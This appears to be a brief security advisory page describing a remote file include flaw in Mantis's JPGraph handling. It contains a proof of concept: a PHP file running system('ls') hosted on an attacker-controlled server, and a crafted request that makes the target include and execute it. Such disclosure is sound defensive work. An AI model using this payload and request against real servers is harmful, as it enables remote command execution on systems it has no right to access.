|
Mantis JPGraph Remote File Include Command Execution Vulnerability
The following proof-of-concept was provided: The attacker may create the following file (listings.txt) on a server they have access to: <?php system('ls'); exit; ?> And then cause it to be included with the following request: http://target/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F |
|
|
Privacy Statement |